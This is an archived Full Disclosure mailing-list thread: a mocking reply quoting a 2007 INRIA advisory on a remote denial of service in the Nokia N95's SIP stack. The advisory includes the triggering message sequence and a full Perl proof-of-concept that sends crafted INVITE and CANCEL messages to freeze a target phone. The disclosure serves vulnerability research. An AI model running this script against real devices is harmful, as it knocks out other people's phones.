Full Disclosure: Re: Nokia N95 cellphone remote DoS using the SIP Stack

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Full Disclosure mailing list archives

Re: Nokia N95 cellphone remote DoS using the SIP Stack

From: reepex <reepex () gmail com>
Date: Wed, 5 Dec 2007 13:21:06 -0600

So almighty Phd what is your thesis exactly?

To me it seems to be  'how to run a fuzzer then write crappy perl  scripts
to exploit DoS conditions'

does this properly summarize your phd credentials?

I guess  you could tack on 'after writing the crappy scripts, flood mailing
lists with our crap, and get made fun of'

I am sure you will serve the academic community great one day when teach
"hacking" classes revolving around the latest editions of hacking exposed



On Dec 5, 2007 11:05 AM, Radu State <State () loria fr> wrote:

 Nokia N95 cellphone remote DoS using the SIP Stack



Severity:

High – Denial of Service



Hardware:

Nokia N95



Firmware:

Tested version: Nokia RM-159 V 12.0.013



Notification:

Vulnerability found: 11 September 2007

Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
Security Support: 19 September 2007 / None reply



Vulnerability Synopsis:

If the device has the SIP Phone client activated, a sequence of SIP
messages turn the device in an inconsistent state where the user is not able
to operate it anymore until it reboots.



The sequence of messages consists in 2 different SIP Dialogs where the
first initiates an INVITE transaction but immediately closes it (in an
anticipated manner). While, the second transaction initiates a normal INVITE
transaction that trigger the vulnerability of the target.



The sequence of messages is illustrated below.



X ------------------------- INVITE -----------------------> Nokiav12

X <---------------------- 100 Trying ---------------------- Nokiav12

X ------------------------- CANCEL -----------------------> Nokiav12

X <----------------- OK (to the Cancel) ------------------- Nokiav12

 X <---------------- 487 Request Terminated ---------------- Nokiav12



--------New Dialog--------



X ------------------------- INVITE -----------------------> Nokiav12

X <---------------------- 100 Trying ---------------------- Nokiav12

X <---------------------- 180 Trying ---------------------- Nokiav12



---- The device does not work properly anymore ----



Impact:

A remote entity can take down all the services of the cell phone



Resolution:

As we did not get any proper reply from Nokia about the subject, the best
way will be to disable the SIP Client



Credits:

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)



This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF the Madynes VoIP fuzzer.

http://madynes.loria.fr/





Proof of Concept:



A perl script (nokiav12.pl) is attached to this mail. Before launching

it, the SIP phone has to be initialed in the target device



Command:

perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>



Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu





#!/usr/bin/perl



##################################################

# Vulnerabily discovered using KiF ~ Kiph #

# #

# Authors: #

# Humberto J. Abdelnur (Ph.D Student) #

# Radu State (Ph.D) #

# Olivier Festor (Ph.D) #

# #

# Madynes Team, LORIA - INRIA Lorraine #

# http://madynes.loria.fr #

##################################################



use IO::Socket::INET;

use String::Random;



die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"

unless ($ARGV[3]);



$targetUser = $ARGV[1];

$targetIP = $ARGV[0];



$attackerUser = $ARGV[3];

$attackerIP= $ARGV[2];



$socket=new IO::Socket::INET->new(

Proto=>'udp',

PeerPort=>5060,

PeerAddr=>$targetIP,

LocalPort=>5060);



$foo = new String::Random;

$callid= $foo->randpattern("CCccnCn");

$cseq = $foo->randregex('\d\d\d\d');



$sdp = "v=0\r

o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r

s=-\r

c=IN IP4 $attackerIP\r

t=0 0\r

m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r

a=sendrecv\r

a=ptime:20\r

a=maxptime:200\r

a=fmtp:96 mode-change-neighbor=1\r

a=fmtp:18 annexb=no\r

a=fmtp:98 0-15\r

a=rtpmap:96 AMR/8000/1\r

a=rtpmap:0 PCMU/8000/1\r

a=rtpmap:8 PCMA/8000/1\r

a=rtpmap:97 iLBC/8000/1\r

a=rtpmap:18 G729/8000/1\r

a=rtpmap:98 telephone-event/8000/1\r

a=rtpmap:13 CN/8000/1\r

";



$sdplen= length $sdp;



$msg = "INVITE sip:$targetUser\ () $targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\ () $attackerIP>;tag=1\r

To: <sip:$targetUser\ () $targetIP>\r

Call-ID: $callid\ () $attackerIP\r

CSeq: $cseq INVITE\r

Max-Forwards: 70\r

Contact: <sip:$attackerUser\ () $attackerIP>\r

Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,

MESSAGE\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);

$text = '';

while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){

$socket->recv($text,1024,0);

}



$msg = "CANCEL sip:$targetUser\ () $targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\ () $attackerIP>;tag=1\r

To: <sip:$targetUser\ () $targetIP>;tag=1\r

Call-ID: $callid\ () $attackerIP\r

CSeq: $cseq CANCEL\r

Max-Forwards: 70\r

Content-Length: 0\r

\r

";

$socket->send($msg);

time.sleep(1);

$callid= $foo->randpattern("CCccnCn");

$cseq = $foo->randregex('\d\d\d\d');

$msg = "INVITE sip:$targetUser\ () $targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r

From: <sip:$attackerUser\ () $attackerIP>;tag=2\r

To: <sip:$targetUser\ () $targetIP>\r

Call-ID: $callid\ () $attackerIP\r

CSeq: $cseq INVITE\r

Contact: <sip:$attackerUser\ () $attackerIP>\r

Max-Forwards: 70\r

Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,

MESSAGE\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);







No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:
04/12/2007 19:31

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

By Date By Thread

Current thread:

Nokia N95 cellphone remote DoS using the SIP Stack Radu State (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
  - Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
    - Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
    - Re: Nokia N95 cellphone remote DoS using the SIP Stack nnp (Dec 05)
    - Re: Nokia N95 cellphone remote DoS using the SIP Stack Humberto Abdelnur (Dec 06)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)